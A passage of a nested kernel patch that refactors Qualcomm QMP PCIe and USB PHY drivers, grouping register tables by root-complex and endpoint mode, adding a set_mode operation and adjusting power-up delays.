++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
++	},
++	.tables_rc = &(const struct qmp_phy_cfg_tables) {
++		.tx		= sm8250_qmp_gen3x2_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_tx_tbl),
++		.rx		= sm8250_qmp_gen3x2_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_gen3x2_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_gen3x2_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1670,23 +1707,21 @@ static const struct qmp_phy_cfg sm8250_qmp_gen3x2_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= msm8998_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(msm8998_pcie_serdes_tbl),
+-	.tx_tbl			= msm8998_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(msm8998_pcie_tx_tbl),
+-	.rx_tbl			= msm8998_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(msm8998_pcie_rx_tbl),
+-	.pcs_tbl		= msm8998_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(msm8998_pcie_pcs_tbl),
++	.tables = {
++		.serdes		= msm8998_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(msm8998_pcie_serdes_tbl),
++		.tx		= msm8998_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(msm8998_pcie_tx_tbl),
++		.rx		= msm8998_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(msm8998_pcie_rx_tbl),
++		.pcs		= msm8998_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(msm8998_pcie_pcs_tbl),
++	},
+ 	.clk_list		= msm8996_phy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(msm8996_phy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1698,21 +1733,25 @@ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ 	.start_ctrl             = SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
++
++	.skip_start_delay	= true,
+ };
+ 
+ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sc8180x_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sc8180x_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sc8180x_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_rx_tbl),
+-	.pcs_tbl		= sc8180x_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sc8180x_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sc8180x_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sc8180x_qmp_pcie_serdes_tbl),
++		.tx		= sc8180x_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sc8180x_qmp_pcie_tx_tbl),
++		.rx		= sc8180x_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sc8180x_qmp_pcie_rx_tbl),
++		.pcs		= sc8180x_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sc8180x_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sc8180x_qmp_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1723,25 +1762,24 @@ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+ 
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
++	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg sdx55_qmp_pciephy_cfg = {
+ 	.lanes			= 2,
+ 
+-	.serdes_tbl		= sdx55_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sdx55_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sdx55_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_rx_tbl),
+-	.pcs_tbl		= sdx55_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sdx55_qmp_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sdx55_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sdx55_qmp_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sdx55_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sdx55_qmp_pcie_serdes_tbl),
++		.tx		= sdx55_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sdx55_qmp_pcie_tx_tbl),
++		.rx		= sdx55_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sdx55_qmp_pcie_rx_tbl),
++		.pcs		= sdx55_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sdx55_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sdx55_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sdx55_qmp_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1753,25 +1791,23 @@ static const struct qmp_phy_cfg sdx55_qmp_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN,
+ 	.phy_status		= PHYSTATUS_4_20,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8450_qmp_gen3x1_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sm8450_qmp_gen3x1_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_serdes_tbl),
+-	.tx_tbl			= sm8450_qmp_gen3x1_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_tx_tbl),
+-	.rx_tbl			= sm8450_qmp_gen3x1_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_rx_tbl),
+-	.pcs_tbl		= sm8450_qmp_gen3x1_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8450_qmp_gen3x1_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sm8450_qmp_gen3x1_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_serdes_tbl),
++		.tx		= sm8450_qmp_gen3x1_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_tx_tbl),
++		.rx		= sm8450_qmp_gen3x1_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_rx_tbl),
++		.pcs		= sm8450_qmp_gen3x1_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_tbl),
++		.pcs_misc	= sm8450_qmp_gen3x1_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen3x1_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1783,25 +1819,38 @@ static const struct qmp_phy_cfg sm8450_qmp_gen3x1_pciephy_cfg = {
+ 	.start_ctrl             = SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8450_qmp_gen4x2_pciephy_cfg = {
+ 	.lanes			= 2,
+ 
+-	.serdes_tbl		= sm8450_qmp_gen4x2_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_serdes_tbl),
+-	.tx_tbl			= sm8450_qmp_gen4x2_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_tx_tbl),
+-	.rx_tbl			= sm8450_qmp_gen4x2_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rx_tbl),
+-	.pcs_tbl		= sm8450_qmp_gen4x2_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8450_qmp_gen4x2_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sm8450_qmp_gen4x2_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_serdes_tbl),
++		.tx		= sm8450_qmp_gen4x2_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_tx_tbl),
++		.rx		= sm8450_qmp_gen4x2_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rx_tbl),
++		.pcs		= sm8450_qmp_gen4x2_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_tbl),
++		.pcs_misc	= sm8450_qmp_gen4x2_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_misc_tbl),
++	},
++
++	.tables_rc = &(const struct qmp_phy_cfg_tables) {
++		.serdes		= sm8450_qmp_gen4x2_pcie_rc_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rc_serdes_tbl),
++		.pcs_misc	= sm8450_qmp_gen4x2_pcie_rc_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rc_pcs_misc_tbl),
++	},
++
++	.tables_ep = &(const struct qmp_phy_cfg_tables) {
++		.serdes		= sm8450_qmp_gen4x2_pcie_ep_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_ep_serdes_tbl),
++		.pcs_misc	= sm8450_qmp_gen4x2_pcie_ep_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_ep_pcs_misc_tbl),
++	},
++
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1813,10 +1862,6 @@ static const struct qmp_phy_cfg sm8450_qmp_gen4x2_pciephy_cfg = {
+ 	.start_ctrl             = SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS_4_20,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static void qmp_pcie_configure_lane(void __iomem *base,
+@@ -1850,17 +1895,49 @@ static void qmp_pcie_configure(void __iomem *base,
+ 	qmp_pcie_configure_lane(base, regs, tbl, num, 0xff);
+ }
+ 
+-static int qmp_pcie_serdes_init(struct qmp_phy *qphy)
++static void qmp_pcie_serdes_init(struct qmp_phy *qphy, const struct qmp_phy_cfg_tables *tables)
+ {
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+ 	void __iomem *serdes = qphy->serdes;
+-	const struct qmp_phy_init_tbl *serdes_tbl = cfg->serdes_tbl;
+-	int serdes_tbl_num = cfg->serdes_tbl_num;
+ 
+-	qmp_pcie_configure(serdes, cfg->regs, serdes_tbl, serdes_tbl_num);
+-	qmp_pcie_configure(serdes, cfg->regs, cfg->serdes_tbl_sec, cfg->serdes_tbl_num_sec);
++	if (!tables)
++		return;
+ 
+-	return 0;
++	qmp_pcie_configure(serdes, cfg->regs, tables->serdes, tables->serdes_num);
++}
++
++static void qmp_pcie_lanes_init(struct qmp_phy *qphy, const struct qmp_phy_cfg_tables *tables)
++{
++	const struct qmp_phy_cfg *cfg = qphy->cfg;
++	void __iomem *tx = qphy->tx;
++	void __iomem *rx = qphy->rx;
++
++	if (!tables)
++		return;
++
++	qmp_pcie_configure_lane(tx, cfg->regs, tables->tx, tables->tx_num, 1);
++
++	if (cfg->lanes >= 2)
++		qmp_pcie_configure_lane(qphy->tx2, cfg->regs, tables->tx, tables->tx_num, 2);
++
++	qmp_pcie_configure_lane(rx, cfg->regs, tables->rx, tables->rx_num, 1);
++	if (cfg->lanes >= 2)
++		qmp_pcie_configure_lane(qphy->rx2, cfg->regs, tables->rx, tables->rx_num, 2);
++}
++
++static void qmp_pcie_pcs_init(struct qmp_phy *qphy, const struct qmp_phy_cfg_tables *tables)
++{
++	const struct qmp_phy_cfg *cfg = qphy->cfg;
++	void __iomem *pcs = qphy->pcs;
++	void __iomem *pcs_misc = qphy->pcs_misc;
++
++	if (!tables)
++		return;
++
++	qmp_pcie_configure(pcs, cfg->regs,
++			   tables->pcs, tables->pcs_num);
++	qmp_pcie_configure(pcs_misc, cfg->regs,
++			   tables->pcs_misc, tables->pcs_misc_num);
+ }
+ 
+ static int qmp_pcie_init(struct phy *phy)
+@@ -1932,15 +2009,19 @@ static int qmp_pcie_power_on(struct phy *phy)
+ 	struct qmp_phy *qphy = phy_get_drvdata(phy);
+ 	struct qcom_qmp *qmp = qphy->qmp;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+-	void __iomem *tx = qphy->tx;
+-	void __iomem *rx = qphy->rx;
++	const struct qmp_phy_cfg_tables *mode_tables;
+ 	void __iomem *pcs = qphy->pcs;
+-	void __iomem *pcs_misc = qphy->pcs_misc;
+ 	void __iomem *status;
+ 	unsigned int mask, val, ready;
+ 	int ret;
+ 
+-	qmp_pcie_serdes_init(qphy);
++	if (qphy->mode == PHY_MODE_PCIE_RC)
++		mode_tables = cfg->tables_rc;
++	else
++		mode_tables = cfg->tables_ep;
++
++	qmp_pcie_serdes_init(qphy, &cfg->tables);
++	qmp_pcie_serdes_init(qphy, mode_tables);
+ 
+ 	ret = clk_prepare_enable(qphy->pipe_clk);
+ 	if (ret) {
+@@ -1949,40 +2030,11 @@ static int qmp_pcie_power_on(struct phy *phy)
+ 	}
+ 
+ 	/* Tx, Rx, and PCS configurations */
+-	qmp_pcie_configure_lane(tx, cfg->regs, cfg->tx_tbl, cfg->tx_tbl_num, 1);
+-	qmp_pcie_configure_lane(tx, cfg->regs, cfg->tx_tbl_sec, cfg->tx_tbl_num_sec, 1);
+-
+-	if (cfg->lanes >= 2) {
+-		qmp_pcie_configure_lane(qphy->tx2, cfg->regs, cfg->tx_tbl,
+-					cfg->tx_tbl_num, 2);
+-		qmp_pcie_configure_lane(qphy->tx2, cfg->regs, cfg->tx_tbl_sec,
+-					cfg->tx_tbl_num_sec, 2);
+-	}
+-
+-	qmp_pcie_configure_lane(rx, cfg->regs, cfg->rx_tbl, cfg->rx_tbl_num, 1);
+-	qmp_pcie_configure_lane(rx, cfg->regs, cfg->rx_tbl_sec, cfg->rx_tbl_num_sec, 1);
+-
+-	if (cfg->lanes >= 2) {
+-		qmp_pcie_configure_lane(qphy->rx2, cfg->regs, cfg->rx_tbl,
+-					cfg->rx_tbl_num, 2);
+-		qmp_pcie_configure_lane(qphy->rx2, cfg->regs, cfg->rx_tbl_sec,
+-					cfg->rx_tbl_num_sec, 2);
+-	}
++	qmp_pcie_lanes_init(qphy, &cfg->tables);
++	qmp_pcie_lanes_init(qphy, mode_tables);
+ 
+-	qmp_pcie_configure(pcs, cfg->regs, cfg->pcs_tbl, cfg->pcs_tbl_num);
+-	qmp_pcie_configure(pcs, cfg->regs, cfg->pcs_tbl_sec, cfg->pcs_tbl_num_sec);
+-
+-	qmp_pcie_configure(pcs_misc, cfg->regs, cfg->pcs_misc_tbl, cfg->pcs_misc_tbl_num);
+-	qmp_pcie_configure(pcs_misc, cfg->regs, cfg->pcs_misc_tbl_sec, cfg->pcs_misc_tbl_num_sec);
+-
+-	/*
+-	 * Pull out PHY from POWER DOWN state.
+-	 * This is active low enable signal to power-down PHY.
+-	 */
+-	qphy_setbits(pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL, cfg->pwrdn_ctrl);
+-
+-	if (cfg->has_pwrdn_delay)
+-		usleep_range(cfg->pwrdn_delay_min, cfg->pwrdn_delay_max);
++	qmp_pcie_pcs_init(qphy, &cfg->tables);
++	qmp_pcie_pcs_init(qphy, mode_tables);
+ 
+ 	/* Pull PHY out of reset state */
+ 	qphy_clrbits(pcs, cfg->regs[QPHY_SW_RESET], SW_RESET);
+@@ -1990,6 +2042,9 @@ static int qmp_pcie_power_on(struct phy *phy)
+ 	/* start SerDes and Phy-Coding-Sublayer */
+ 	qphy_setbits(pcs, cfg->regs[QPHY_START_CTRL], cfg->start_ctrl);
+ 
++	if (!cfg->skip_start_delay)
++		usleep_range(1000, 1200);
++
+ 	status = pcs + cfg->regs[QPHY_PCS_STATUS];
+ 	mask = cfg->phy_status;
+ 	ready = 0;
+@@ -2060,6 +2115,23 @@ static int qmp_pcie_disable(struct phy *phy)
+ 	return qmp_pcie_exit(phy);
+ }
+ 
++static int qmp_pcie_set_mode(struct phy *phy, enum phy_mode mode, int submode)
++{
++	struct qmp_phy *qphy = phy_get_drvdata(phy);
++
++	switch (submode) {
++	case PHY_MODE_PCIE_RC:
++	case PHY_MODE_PCIE_EP:
++		qphy->mode = submode;
++		break;
++	default:
++		dev_err(&phy->dev, "Unsupported submode %d\n", submode);
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
+ static int qmp_pcie_vreg_init(struct device *dev, const struct qmp_phy_cfg *cfg)
+ {
+ 	struct qcom_qmp *qmp = dev_get_drvdata(dev);
+@@ -2183,6 +2255,7 @@ static int phy_pipe_clk_register(struct qcom_qmp *qmp, struct device_node *np)
+ static const struct phy_ops qmp_pcie_ops = {
+ 	.power_on	= qmp_pcie_enable,
+ 	.power_off	= qmp_pcie_disable,
++	.set_mode	= qmp_pcie_set_mode,
+ 	.owner		= THIS_MODULE,
+ };
+ 
+@@ -2198,6 +2271,8 @@ static int qmp_pcie_create(struct device *dev, struct device_node *np, int id,
+ 	if (!qphy)
+ 		return -ENOMEM;
+ 
++	qphy->mode = PHY_MODE_PCIE_RC;
++
+ 	qphy->cfg = cfg;
+ 	qphy->serdes = serdes;
+ 	/*
+@@ -2240,7 +2315,9 @@ static int qmp_pcie_create(struct device *dev, struct device_node *np, int id,
+ 		qphy->pcs_misc = qphy->pcs + 0x400;
+ 
+ 	if (IS_ERR(qphy->pcs_misc)) {
+-		if (cfg->pcs_misc_tbl || cfg->pcs_misc_tbl_sec)
++		if (cfg->tables.pcs_misc ||
++		    (cfg->tables_rc && cfg->tables_rc->pcs_misc) ||
++		    (cfg->tables_ep && cfg->tables_ep->pcs_misc))
+ 			return PTR_ERR(qphy->pcs_misc);
+ 	}
+ 
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h
+index 1eedf50cf9cbc..3d9713d348fe6 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h
+@@ -8,8 +8,10 @@
+ 
+ /* Only for QMP V5_20 PHY - PCIe PCS registers */
+ #define QPHY_V5_20_PCS_PCIE_ENDPOINT_REFCLK_DRIVE	0x01c
++#define QPHY_V5_20_PCS_PCIE_OSC_DTCT_MODE2_CONFIG5	0x084
+ #define QPHY_V5_20_PCS_PCIE_OSC_DTCT_ACTIONS		0x090
+ #define QPHY_V5_20_PCS_PCIE_EQ_CONFIG1			0x0a0
++#define QPHY_V5_20_PCS_PCIE_PRESET_P10_POST		0x0e0
+ #define QPHY_V5_20_PCS_PCIE_G4_EQ_CONFIG5		0x108
+ #define QPHY_V5_20_PCS_PCIE_G4_PRE_GAIN			0x15c
+ #define QPHY_V5_20_PCS_PCIE_RX_MARGINING_CONFIG3	0x184
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcs-v5_20.h b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-v5_20.h
+new file mode 100644
+index 0000000000000..9a5a20daf62cd
+--- /dev/null
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-v5_20.h
+@@ -0,0 +1,14 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (c) 2022, Linaro Ltd.
++ */
++
++#ifndef QCOM_PHY_QMP_PCS_V5_20_H_
++#define QCOM_PHY_QMP_PCS_V5_20_H_
++
++#define QPHY_V5_20_PCS_G3S2_PRE_GAIN			0x170
++#define QPHY_V5_20_PCS_RX_SIGDET_LVL			0x188
++#define QPHY_V5_20_PCS_EQ_CONFIG4			0x1e0
++#define QPHY_V5_20_PCS_EQ_CONFIG5			0x1e4
++
++#endif
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-usb.c b/drivers/phy/qualcomm/phy-qcom-qmp-usb.c
+index b84c0d4b57541..f0ba35bb73c1b 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-usb.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-usb.c
+@@ -63,8 +63,6 @@
+ #define CLAMP_EN				BIT(0) /* enables i/o clamp_n */
+ 
+ #define PHY_INIT_COMPLETE_TIMEOUT		10000
+-#define POWER_DOWN_DELAY_US_MIN			10
+-#define POWER_DOWN_DELAY_US_MAX			11
+ 
+ struct qmp_phy_init_tbl {
+ 	unsigned int offset;
+@@ -126,6 +124,7 @@ static const unsigned int usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+ 	[QPHY_PCS_AUTONOMOUS_MODE_CTRL]	= 0x0d4,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_CLEAR]  = 0x0d8,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_STATUS] = 0x178,
++	[QPHY_PCS_POWER_DOWN_CONTROL]	= 0x04,
+ };
+ 
+ static const unsigned int qmp_v3_usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+@@ -135,6 +134,7 @@ static const unsigned int qmp_v3_usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+ 	[QPHY_PCS_AUTONOMOUS_MODE_CTRL]	= 0x0d8,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_CLEAR]  = 0x0dc,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_STATUS] = 0x170,
++	[QPHY_PCS_POWER_DOWN_CONTROL]	= 0x04,
+ };
+ 
+ static const unsigned int qmp_v4_usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+@@ -1456,16 +1456,8 @@ struct qmp_phy_cfg {
+ 	/* array of registers with different offsets */
+ 	const unsigned int *regs;
+ 
+-	unsigned int start_ctrl;
+-	unsigned int pwrdn_ctrl;
+-	/* bit offset of PHYSTATUS in QPHY_PCS_STATUS register */
+-	unsigned int phy_status;
+-
+ 	/* true, if PHY needs delay after POWER_DOWN */
+ 	bool has_pwrdn_delay;
+-	/* power_down delay in usec */
+-	int pwrdn_delay_min;
+-	int pwrdn_delay_max;
+ 
+ 	/* true, if PHY has a separate DP_COM control block */
+ 	bool has_phy_dp_com_ctrl;
+@@ -1616,11 +1608,7 @@ static const struct qmp_phy_cfg ipq8074_usb3phy_cfg = {
+ 	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+-	.regs			= usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
++	.regs			= qmp_v3_usb3phy_regs_layout,
+ };
+ 
+ static const struct qmp_phy_cfg msm8996_usb3phy_cfg = {
+@@ -1641,10 +1629,6 @@ static const struct qmp_phy_cfg msm8996_usb3phy_cfg = {
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg qmp_v3_usb3phy_cfg = {
+@@ -1666,14 +1650,7 @@ static const struct qmp_phy_cfg qmp_v3_usb3phy_cfg = {
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1696,14 +1673,7 @@ static const struct qmp_phy_cfg sc7180_usb3phy_cfg = {
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1725,14 +1695,7 @@ static const struct qmp_phy_cfg sc8280xp_usb3_uniphy_cfg = {
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
++	.pcs_usb_offset		= 0x1000,
+ };
+ 
+ static const struct qmp_phy_cfg qmp_v3_usb3_uniphy_cfg = {
